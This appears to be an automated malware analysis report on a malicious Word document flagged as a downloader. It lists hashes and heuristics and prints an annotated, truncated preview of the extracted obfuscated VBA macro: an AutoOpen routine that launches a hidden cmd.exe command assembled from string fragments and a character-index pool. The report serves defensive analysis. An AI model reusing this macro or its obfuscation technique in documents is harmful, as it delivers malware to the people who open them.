Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 618c0d614fe0590e…

MALICIOUS

Office (OLE)

143.8 KB Created: 2018-08-13 10:51:00 Authoring application: Microsoft Office Word First seen: 2018-08-26
MD5: 72c63f5523bc1551658bbddbaa492ea2 SHA-1: a9f243a4899ecb6ed5e5137192d0e92705e1982d SHA-256: 618c0d614fe0590eed529dfec0f59941cd054b034a9e7eee11e95d0cdaa3df74
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro calls Shell with a command line that is assembled from many concatenated string fragments; that command appears to construct a URL and download a second-stage payload. The ClamAV detection and the heuristic firings strongly indicate a downloader family.

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-6666962-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6666962-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; by itself it does not attribute a downloader or a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26500 bytes
SHA-256: 236fe789911b5a166d89a3a1045557445889c3e2b8da0b9b9f7a15ad15c61603
Preview script
First 1,000 lines of the extracted script
' Module header attributes as emitted by olevba; these are VBA project metadata, not
' executable statements. The module name is a random-looking string, consistent with
' the obfuscated identifiers used throughout the procedures below.
Attribute VB_Name = "lPYUSILNazfEz"
' VB_Base of "1Normal.ThisDocument" indicates this is the document class module
' (derived from the Normal template; VB_TemplateDerived = True below agrees).
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' AutoOpen: Word auto-execution entry point (the report's OLE_VBA_AUTOOPEN finding).
' Everything in this routine except the Shell call is filler.
Sub AutoOpen()
' Swallows every runtime error, so the references to names that are never defined
' anywhere visible (QpOwL, zijwk, crYww, VLbOzM, FhzUR) do not abort the procedure.
On Error Resume Next
   ' TypeName used as a statement: the result is discarded and nothing is assigned,
   ' so these lines have no effect on the command line; they look like padding meant
   ' to hide the one meaningful statement below.
   TypeName QpOwL
   TypeName 3760
   TypeName zijwk
   TypeName Sin(crYww)
' The only real action: launch an external process via Shell. The command line is the
' concatenation of KeyString(vbKeyC) and 22 other names; only GjHGRzotWTv and YzSmtBAsv
' are visible in this excerpt, the rest presumably are functions in the truncated part.
' KeyString(vbKeyC) presumably yields the letter "C"/"c" and GjHGRzotWTv begins with
' "md ", so the process launched is most likely cmd.exe. The second argument is
' 587441650 - 587441650 = 0, i.e. vbHide: the window is not shown to the user.
' The trailing "!" on Shell is a type-declaration suffix and presumably does not change
' the call — TODO confirm.
Shell! KeyString(vbKeyC) + aJEtHuwZTwXmaE + EvjkKbkw + GjHGRzotWTv + YzSmtBAsv + oFJiFOrk + EYACuIb + NwwJTnUMwB + RfEjanVWkra + GPrrtdon + PkTvhbkz + isDmnTacoKZ + jRLhri + DPKNTTiojbP + awXIWvpiQjE + EDjPmRUJ + flNdzWVWDZ + RNowmKSYiL + bQrfzjKwb + JYTaE + BjGwpcVj + tUfHfqlpr + dNkzZHHkw, 587441650 - 587441650
   ' More discarded TypeName filler after the launch.
   TypeName VLbOzM
   TypeName CInt(FhzUR)
End Sub


' Second module (again a random-looking name); it holds the string-building helper
' functions whose return values AutoOpen concatenates into the Shell command line.
Attribute VB_Name = "pGjMpsr"
' GjHGRzotWTv: returns one fragment of the Shell command line built in AutoOpen.
' The fragment is assembled from seven local strings, each itself a concatenation of
' short literals and CStr(Chr(<sum>)) terms. The named terms inside each Chr() sum
' (REwfrYkWzUmRIH, MuhVcuTUzIb, ...) are never assigned anywhere visible; if they are
' unassigned, as appears to be the case, they contribute 0 and only the numeric literal
' matters: Chr(67) = "C", Chr(34) = double quote, Chr(108) = "l", Chr(99) = "c".
' The lines of the form "TypeName <expr>" discard their result and are filler.
Function GjHGRzotWTv()
' Error suppression, same purpose as in AutoOpen: undefined names must not abort the build.
On Error Resume Next
TypeName Hex(27927 - rpRmh - 6937 + TXzrWW)
   TypeName EhvJJu
' Fragment 1: "md  /V:O    /C  "  s" (with the two Chr() terms resolved as above).
' Together with the leading letter supplied in AutoOpen this reads as a cmd.exe
' invocation; "/V:O" looks like the delayed-variable-expansion switch (/V:ON) and
' the Chr(34) opens the quoted command that follows "/C".
OlBjZjcr = "md " + " /V" + ":O " + "   " + "/" + CStr(Chr(REwfrYkWzUmRIH + MuhVcuTUzIb + 67 + fXcADzDjmEJbF + WGPlBKboFUXXkd)) + "  " + CStr(Chr(wUhRzJQEHXzZ + tXzXzstqOi + 34 + WjjcTCFVMGXf + pKddLBwha)) + "  s"
TypeName Chr(9679)
   TypeName CSng(2)
' Fragment 2: "et kpx=lHUwrRfza" — completes "set kpx=" and starts the value of an
' environment variable named kpx.
qCPcS = "et" + " k" + "px" + "=" + CStr(Chr(NjnqGGDNPm + iEwTULnzSY + 108 + jMlSCjp + DFWSiFAUSja)) + "H" + "Uw" + "rRf" + "za"
TypeName Rnd(pEvzRs)
   TypeName Tan(4)
' Fragments 3-5 continue the kpx value: a mixed run of letters, digits and punctuation
' that looks like a character pool rather than a readable command.
QksPHFinw = "p" + "aiN" + "z" + CStr(Chr(wYOidVnBHpvk + VkKfzitbwaBqFm + 67 + oKzzNME + TSiwQah)) + "q" + "Hfu" + ":D" + "o" + CStr(Chr(ijHEdbsX + jnQAVGBlnJjJj + 99 + dLOfizUStIw + jWFpmPoRDRIp)) + "(4Y" + "Q0" + "S" + "."
TypeName Sgn(MmzXLr)
   TypeName CStr(wkYCRI * EGjGp)
   TypeName Log(69)
hCpEP = "1," + "x" + "k" + "}$" + ")" + " s" + "6dK" + "=" + "m" + "n5/" + "+y"
TypeName Chr(27)
   TypeName ObCadL
SirqO = "gb" + "W-" + "Te" + "P\v" + "2" + "t" + "j" + "{" + "78M" + "h@;" + "B"
TypeName NnEZvB
   TypeName Hex(qMGHRB)
   TypeName CDate(VIJmi)
' Fragment 6: "O'FZ&&  for  " — ends the kpx value and chains a for loop with "&&".
dtAQIhNsWW = "O'" + "F" + "Z&&" + " " + " f" + "o" + "r  "
TypeName PwLJkf
   TypeName 4
   TypeName Sqr(465552189)
' Fragment 7: "%G in  (  9, 21   , " — the start of the loop's index list. This is the
' well-known delayed-expansion pattern in which the real command is rebuilt by picking
' characters out of the kpx pool by index; the remaining indices presumably come from
' YzSmtBAsv, the next function in the listing (truncated in this excerpt).
tiImmVnMLN = "%" + "G i" + "n " + " ( " + " 9," + " " + " " + "2" + "1" + "  " + " " + " ," + "  "
' Return value: the seven fragments in order.
GjHGRzotWTv = OlBjZjcr + qCPcS + QksPHFinw + hCpEP + SirqO + dtAQIhNsWW + tiImmVnMLN
   TypeName tSXNYz
   TypeName 211719404
End Function
Function YzSmtBAsv()
On Error Resume Next
TypeName 5
   TypeName ChrB(cNzMM + GfnKuA)
Nwzowhstc = " " + " " + "3" + ", " + " " + "54"
TypeName Atn(22788 + pUUhMW)
   TypeName Oct(jfDWc)
jEbtV = "   " + ", " + " " + "  4" + "  " + "," + " "
TypeName Hex(pUVCa)
   TypeName Chr(zBfAwY * 18273)
   TypeName kBjSmw
WsLObzUVC = " " + "  3" + "8, " + "  " + " 65" + "," + "  " + "5" + "4 ,"
TypeName CDbl(sVZTQ)
   TypeName 4782
ZZZpVzQdV = "0 ," + " " + "0," + "37 " + " " + ",3" + "5 ," + "   " + " 9 " + " , "
TypeName 83
   TypeName HBkzjk
   TypeName Atn(706)
tmKzZwZVq = " " + "2" + "5" + "  " + " " + " ," + "   " + "53 " + " " + "  " + ",  "
TypeName 16717671
   TypeName CInt(62764 - qvLvBh * jjKCiF * GzEfk)
llNzMWr = " " + "42 " + "   " + ", " + " 44" + "  " + " " + ", 5" + "4,"
TypeName Atn(UffwK / SjZMla)
   TypeName 380893470
   TypeName Sin(Bjasnl)
aJilYWJoJl = "  3" + " " + " " + "," + "5" + "2" + " ,2" + "1" + " " + ", " + "  " + "5"
TypeName NfNZj
   TypeName Sqr(64990 / mowrJb - 19353 - JLapu)
   TypeName 543
opXwDIa = "0" + " ," + " 60" + "  ," + " " + " " + "54 " + " " + " " + " " + ", " + "   " + "22 "
TypeName 8714
   TypeName Atn(25291 * zuvNv * 31279 / KNwVwi)
EEklTR = "   " + "," + " 59" + " " + " ," + "3" + "7 " + " " + "," + " 12" + "," + " "
TypeName 747
   TypeName ARrtiR
RFLAS = " 54" + ", " + " " + "  " + "59" + "   " + ", 2" + "9,5" + "1,5" + "4,5" + "0" + " " + "   "
TypeName Fix(hvAOAC)
   TypeName Rnd(FFwRzO)
   TypeName CSng(MjOuOv)
LCPbX = ",  " + " " + "14" + " ,0" + " " + " , " + "11," + " " + "54" + " " + "   "
TypeName WLPzVO
   TypeName CLng(mIVHS / jAVKpM)
   TypeName Cos(HNozXH)
Ipanlrub = ",  " + " " + " 44" + "," + "   " + " "
TypeName Round(681)
   TypeName CByte(jkwMF / jtDiu / 86264 * qSlwtA)
   TypeName Tan
... (truncated)